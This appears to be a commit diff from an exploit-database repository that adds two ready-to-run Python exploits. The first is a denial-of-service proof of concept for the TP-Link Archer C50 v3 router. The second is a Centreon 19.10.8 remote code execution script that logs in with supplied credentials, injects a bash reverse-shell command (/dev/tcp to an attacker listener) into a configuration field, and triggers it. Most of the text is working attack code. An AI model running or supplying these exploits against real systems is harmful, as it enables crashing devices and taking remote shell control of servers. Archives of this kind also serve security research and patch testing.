DB: 2020-03-27
3 changes to exploits/shellcodes TP-Link Archer C50 3 - Denial of Service (PoC) Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
This commit is contained in:
parent
606ad946d3
commit
4b289033f4
4 changed files with 136 additions and 0 deletions
42
exploits/hardware/webapps/48255.py
Executable file
42
exploits/hardware/webapps/48255.py
Executable file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC)
|
||||
# Date: 2020-01-25
|
||||
# Exploit Author: thewhiteh4t
|
||||
# Vendor Homepage: https://www.tp-link.com/
|
||||
# Version: TP-Link Archer C50 v3 Build 171227
|
||||
# Tested on: Arch Linux x64
|
||||
# CVE: CVE-2020-9375
|
||||
# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html
|
||||
|
||||
import time
|
||||
import socket
|
||||
|
||||
ip = '192.168.0.1'
|
||||
port = 80
|
||||
|
||||
print('[+] IP : ' + ip)
|
||||
print('[+] Port : ' + str(port))
|
||||
|
||||
for i in range(2):
|
||||
time.sleep(1)
|
||||
try:
|
||||
print('[+] Initializing Socket...')
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(5)
|
||||
print('[!] Connecting to target...')
|
||||
s.connect((ip, port))
|
||||
header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
|
||||
header = header.encode()
|
||||
print('[!] Sending Request...')
|
||||
s.sendall(header)
|
||||
print('[!] Disconnecting Socket...')
|
||||
s.close()
|
||||
if i == 1:
|
||||
print('[-] Exploit Failed!')
|
||||
break
|
||||
except Exception as e:
|
||||
if 'Connection refused' in str(e):
|
||||
print('[+] Connection Refused...Exploit Successful!')
|
||||
break
|
||||
else:
|
||||
print('[-] Exploit Failed!')
|
||||
break
|
|
@ -5,6 +5,7 @@
|
|||
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip
|
||||
# Version: rConfig 3.9.4
|
||||
# Tested on: Cent OS 7 (1908)
|
||||
# CVE: CVE-2020-10879
|
||||
|
||||
#!/usr/bin/python3
|
||||
|
||||
|
|
91
exploits/php/webapps/48256.py
Executable file
91
exploits/php/webapps/48256.py
Executable file
|
@ -0,0 +1,91 @@
|
|||
# Exploit Title: Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution
|
||||
# Date: 2020-03-25
|
||||
# Exploit Author: Engin Demirbilek
|
||||
# Vendor Homepage: https://www.centreon.com/
|
||||
# Version: 19.10.8
|
||||
# Tested on: CentOS
|
||||
# Advisory link: https://engindemirbilek.github.io/centreon-19.10-rce
|
||||
# Corresponding pull request on github: https://github.com/centreon/centreon/pull/8467#event-3163627607
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import requests
|
||||
import sys
|
||||
import warnings
|
||||
from bs4 import BeautifulSoup
|
||||
|
||||
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
|
||||
|
||||
if len(sys.argv) < 6:
|
||||
print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
|
||||
exit()
|
||||
|
||||
url = sys.argv[1]
|
||||
username = sys.argv[2]
|
||||
password = sys.argv[3]
|
||||
ip = sys.argv[4]
|
||||
port = sys.argv[5]
|
||||
|
||||
|
||||
req = requests.session()
|
||||
print("[+] Retrieving CSRF token...")
|
||||
loginPage = req.get(url+"/index.php")
|
||||
response = loginPage.text
|
||||
s = BeautifulSoup(response, 'html.parser')
|
||||
centreon_token = s.find('input', {'name':'centreon_token'})['value']
|
||||
|
||||
login_creds = {
|
||||
"useralias": username,
|
||||
"password": password,
|
||||
"submitLogin": "Connect",
|
||||
"centreon_token": centreon_token
|
||||
}
|
||||
|
||||
|
||||
print("[+] Sendin login request...")
|
||||
login = req.post(url+"/index.php", login_creds)
|
||||
|
||||
if "incorrect" not in login.text:
|
||||
print("[+] Logged In, retrieving second token")
|
||||
|
||||
page = url + "/main.get.php?p=50118"
|
||||
second_token_req = req.get(page)
|
||||
response = second_token_req.text
|
||||
s = BeautifulSoup(response, 'html.parser')
|
||||
second_token = s.find('input', {'name':'centreon_token'})['value']
|
||||
|
||||
payload = {
|
||||
"RRDdatabase_path": "/var/lib/centreon/metrics/",
|
||||
"RRDdatabase_status_path": ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(ip, port),
|
||||
"RRDdatabase_nagios_stats_path": "/var/lib/centreon/nagios-perf/",
|
||||
"reporting_retention": "365",
|
||||
"archive_retention": "31",
|
||||
"len_storage_mysql": "365",
|
||||
"len_storage_rrd": "180",
|
||||
"len_storage_downtimes": "0",
|
||||
"len_storage_comments": "0",
|
||||
"partitioning_retention": "365",
|
||||
"partitioning_retention_forward": "10",
|
||||
"cpartitioning_backup_directory": "/var/cache/centreon/backup",
|
||||
"audit_log_option": "1",
|
||||
"audit_log_retention": "0",
|
||||
"submitC": "Save",
|
||||
"gopt_id": "",
|
||||
"o": "storage",
|
||||
"o": "storage",
|
||||
"centreon_token": second_token,
|
||||
|
||||
|
||||
}
|
||||
print("[+] Sendin payload...")
|
||||
send_payload = req.post(page, payload)
|
||||
|
||||
trigger_url= url + "/include/views/graphs/graphStatus/displayServiceStatus.php"
|
||||
print("[+] Triggerring payload...")
|
||||
trigger = req.get(trigger_url)
|
||||
|
||||
print("[+] Check your listener !...")
|
||||
|
||||
else:
|
||||
print("[-] Wrong credentials")
|
||||
exit()
|
|
@ -42501,3 +42501,5 @@ id,file,description,date,author,type,platform,port
|
|||
48247,exploits/hardware/webapps/48247.py,"UCM6202 1.0.18.13 - Remote Command Injection",2020-03-24,"Jacob Baines",webapps,hardware,
|
||||
48248,exploits/php/webapps/48248.txt,"Joomla! Component GMapFP 3.30 - Arbitrary File Upload",2020-03-25,ThelastVvV,webapps,php,
|
||||
48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
|
||||
48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
|
||||
48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue